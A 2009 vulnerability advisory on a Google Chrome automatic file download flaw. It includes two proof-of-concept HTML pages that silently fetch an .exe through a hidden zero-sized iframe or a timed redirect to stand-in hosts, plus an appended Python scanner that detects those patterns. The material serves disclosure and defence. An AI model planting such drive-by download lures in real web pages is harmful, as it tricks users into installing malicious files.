Written by nerex
Monday, 30 March 2009 22:13
Google Chrome Arbitrary File Download Vulnerability
-\\Bugtraq ID: 31000
-\\Class: Design Error
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Sep 03 2008 12:00AM
-\\Updated: Mar 30 2009 08:26PM
-\\Credit: nerex
-\\Vulnerable: Google Chrome 0.2.149 27
-\\Discussion Google Chrome is prone to a security vulnerability because the application allows users to download arbitrary files without confirmation.
This issue may allow attackers to perform social-engineering or other attacks to trick users into downloading a malicious file.
-\\Exploit(s)/PoC(s): Attackers can use social engineering or other techniques to trick an unsuspecting user into downloading a malicious file.
UPDATE (March 30, 2009): This issue is being exploited in the wild.
The following examples are available:
===============================================================
31000.html
^^^^^^^^^^^
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>
===============================================================
31000-2.html
^^^^^^^^^^^^^
<html>
<head>
<title>Chrome Auto download Exploit .. By HACKERS PAL</title>
<script>
function soft_download()
{
    window.setTimeout("location.href='http://localhost/1.exe'", 3000);
}
-->
</script>
</head>
<body style="background-color:#000000;" onload="show();">
<script>
<!--
soft_download();
exec('dir');
-->
</script>
<font color="red" size="4"><b>
########################################################<br>
# Google Chrome Auto download :)<br>
# <br>
# Discovered By : HACKERS PAL<br>
# Copy rights : HACKERS PAL<br>
# Website : <a href="http://www.soqor.net">WwW.SoQoR.NeT</a><br>
# Email Address : <a href="[e-mail address protected]">[e-mail address protected]</a><br>
#<br>
# Tested Successfully on Google Chrome Build 1798 <br>
########################################################
</b></font>
-\\Solution Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [e-mail address protected].
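With no vendor patch listed, one defensive check is to flag pages that use the two delivery patterns from the examples above: a frame (written by script or present in markup, typically zero-sized) whose source is an executable, and a scripted `location.href` redirect to one. The Python below is an added example, not part of the original advisory; the extension list, the `scan` function and the sample pages are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: file types treated as unwanted silent-download targets.
RISKY_EXT = (".exe", ".scr", ".msi", ".bat", ".cmd", ".pif")
# Script text: location.href='...' navigation, or a src="..." in written markup.
NAV_RE = re.compile(r"""location(?:\.href)?\s*=\s*['"]([^'"]+)""", re.I)
SRC_RE = re.compile(r"""src\s*=\s*['"]([^'"]+)""", re.I)

def is_risky(url):
    return urlparse(url).path.lower().endswith(RISKY_EXT)

class LureScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self.in_script = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self.in_script = True
        elif tag in ("iframe", "frame") and is_risky(a.get("src") or ""):
            hidden = "0" in (a.get("width"), a.get("height"))
            self.findings.append(("hidden-frame" if hidden else "frame", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:  # script bodies arrive here as raw text
            for kind, rx in (("script-navigation", NAV_RE), ("script-written-frame", SRC_RE)):
                self.findings += [(kind, u) for u in rx.findall(data) if is_risky(u)]

def scan(html):
    parser = LureScanner()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample pages mirroring the two patterns in the advisory, plus a benign one.
WRITTEN_FRAME = """<script>document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');</script>"""
TIMED_NAV = """<script>window.setTimeout("location.href='http://localhost/1.exe'", 3000);</script>"""
BENIGN = """<iframe src="https://www.example.com/help.html" width="300" height="200"></iframe><script>location.href='/home';</script>"""

if __name__ == "__main__":
    for page in (WRITTEN_FRAME, TIMED_NAV, BENIGN):
        print(scan(page))
```

The regular expressions only catch literal URLs in script text; obfuscated or concatenated strings need a rendering-based check instead.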
-\\Reference(s)
--Google Chrome Homepage http://www.google.com/chrom (Google)
--Google Chrome Auto download exploit .. http://www.securityfocus.com/archive/1/49604 ([e-mail address protected])
--Google Chrome Automatic File Download http://www.securityfocus.com/archive/1/49594 ([e-mail address protected])
--RE: Google Chrome Automatic File Download http://www.securityfocus.com/archive/1/49595 (James C. Slora Jr.)
--RES: Google Chrome Automatic File Download http://www.securityfocus.com/archive/1/49595 (DIOGO LEAL CHAGAS)